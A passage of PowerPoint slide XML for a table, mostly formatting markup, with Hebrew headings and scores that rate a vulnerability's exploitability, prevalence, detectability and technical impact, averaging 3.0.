                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1104900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1104900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="667815">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="525258">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" rtl="1"/>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יישום ספציפי</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יכולת ניצול</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>קלה: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>שכיחות</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>נפוצה מאד: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>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marL="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יכולת גילוי</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>קלה:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>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algn="ctr" rtl="1"/>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>השפעה טכנית</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>מתונה:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>השפעה עסקית ספציפית</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1590805">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>3</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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="900"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" kern="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1800" b="1" kern="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1800" b="1" kern="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>ממוצע</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00B050"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>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n-US" sz="1050" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00B050"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" kern="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>= </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>3.0</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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2000" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>*</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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
